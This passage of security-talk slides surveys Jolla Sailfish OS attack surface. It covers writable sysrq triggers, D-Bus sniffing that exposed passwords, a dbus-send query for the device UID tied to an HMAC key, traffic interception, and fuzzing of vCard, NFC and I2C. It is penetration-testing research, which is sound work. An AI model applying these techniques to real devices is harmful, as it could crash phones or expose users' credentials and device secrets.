    • Normal Linux kernel functionality not always well
    configured
    • For example, the "nemo" user is in group "system", which
    has write access to procfs endpoints you wouldn't
    expect, i.e....

    --w--w---- 1 root system 0 2015-06-13 22:24 /proc/sysrq-trigger

    • So anything running as nemo can write e.g. 'b' (reboot) or 'c'
    (crash) to it

  69. Attack Surface: IPC
    • Inter-process communication is another important
    OS / mobile attack surface
    • iOS uses URL handlers, Android uses Intents/Binder/
    ASHMEM - all have led to vulnerabilities in the past
    • What does Sailfish OS use?

  70. D-Bus
    • Freedesktop’s D-Bus used for IPC
    • Common to other Linux environments
    • …but everything runs as “nemo”
    • dbus-monitor provided, acts as sniffer
    • Regular user discovered Outlook passwords
    • Interesting area to explore further

  72. Mapping D-Bus
    • Tavis Ormandy (@taviso) just released dbusmap, an
    “nmap for dbus” - https://github.com/taviso/dbusmap
    • Enumerates methods and properties exposed by D-Bus
    services
    • Amongst standard D-Bus services, several belonged to
    Jolla / MeeGo / Nokia

  73. Exploring D-Bus
    • Can affect code across privilege boundaries - not just
    suid binaries can execute as root.
    • All the same vulns apply. Look for low-hanging fruit
    (command execution, etc.), memory corruption, etc.
    • Did some manual fuzzing (no results), looking
    into dbus fuzzers (suggestions?)
    • Methods / properties can be interacted with using
    dbus-send

  74. Let's try out dbus-send
    $ dbus-send --print-reply --system --dest=org.nemo.ssu /org/nemo/ssu org.nemo.ssu.deviceUid
    method return sender=:1.71 -> dest=:1.70 reply_serial=2
    string "359745050083150"
    m:org.nemo.ssu.deviceUid /org/nemo/ssu
    • Note the value: it is the same 15-digit string that sits at offset 0x10
    of mmcblk0p2 and that opens the HMAC key pulled from R1 earlier

  75. Attack Surface: User Interaction
    • How can the user be attacked?
    • What binaries / utilities / whatever does the vendor
    provide that users interact with and you have a chance
    to affect?
    • Exposed services, anything that reads files (word
    processing, etc.)

  76. Attacking Sailfish users
    • One possibility: /usr/bin/jolla-contacts parses
    VCF (vCard) files
    • Use the Ruby gem vCardigan to generate tons of
    valid VCF files with various fuzz strings
    • Lots of hangs, no crashes yet

  77. Third-Party Apps
    • 3rd party apps
    • We reached out to Jolla to ask them what the
    lifecycle was like.
    • They seemed unsure of what we were asking… still waiting
    for response (update with current info before conf)

  78. How to pen-test the platform
    • How do you assess the platform itself?
    • What do you do if tasked with assessing an app that
    runs on the platform?

  79. Pentesting Applications
    • Traffic can be captured as easily as on any other Linux system
    • Set up proxies for HTTP/HTTPS connections (we all know how to
    do that)
    • Create your own iptables rules and scripts to forward anything
    wherever you want
    • Get dynamic: fashion scripts to load rules when certain
    applications run

  80. More on proxying
    • Browser traffic: .js file
    • General traffic: long-hold WiFi SSID, click Edit
    • Cert pinning (or client-side certs?) - Store, Updates
    • Weirdness: if you check for updates, the actual updates are NOT
    cert pinned (snagged the RPMs this way)
    • As an aside: it sends your Jolla creds with a hashed password
    • Installing a CA cert (like Burp’s) is easy. Look online.
    • put in /etc/pki/tls/certs/
    • run multi_c_rehash

  81. Pentesting Applications
    • It’s similar to pentesting any Linux system application:
    • Evaluate file permissions
    • Use old friends like:
    • gdb
    • ldd
    • strace
    • strings
    • etc…
    • Then find the location of the application’s QML files and it’s code review time

  82. Pentesting Applications
    • Sailfish quirks…
    • Invoker
    • invoker was primarily designed to boost app startup times
    and save device memory
    • invoker also handles group and user privs, such as access
    to the credentials store or contacts DB
    • What is invoker really?
    • Turns out invoker is basically just a wrapper to
    ‘mapplauncherd’
    • The invoker binary takes the app name and a default set of
    options built into the invoker binary and passes them to
    mapplauncherd

  83. Attack Surface: Hardware
    • Emerging attack surface
    • JTAG ports, exposed I2C and SPI, etc.
    • More and more tools (hardware and software)
    to explore this surface (JTAG tools, logic
    analyzers with intuitive software, etc.)
    • Can be used to bypass software restrictions

  84. Other Half: NFC
    • NFC sticker tells phone what theme to download
    • NFC radio only active when switch pressed
    • Sticker is standard MIFARE Ultralight
    • Handled by tohd daemon
    • NFC stack in N9 fuzzed by Charlie Miller, no
    results. Different in Sailfish?
  86. Other Halves
    • I2C port
    • Start by downloading the TOH Developer Kit:
    • Realize that is useless for I2C stuff
    • Develop your own methodology
    • Where my I2C fuzzers at, Google?
    • Seems like no one has ever bothered to fuzz I2C
    • Start by writing the dumbest I2C fuzzer ever
    • Materials:
    • Bus Pirate (wanted to implement on an FPGA but my VHDL/Verilog is
    garbage)
    • Logic analyzer
    • Jolla in developer mode
    • gdb
    • Python (pyBusPirate)

  87. Shoutouts
    • Chris Weedon, our research partner and fellow
    Jolla hacker. Read our EkoParty deck for his
    hardware research!
    • CircleCityCon crew for having us!
    • All of you that came to hear about an obscure
    Finnish phone :)

  88. Thank you!
    Questions? Comments? Complaints?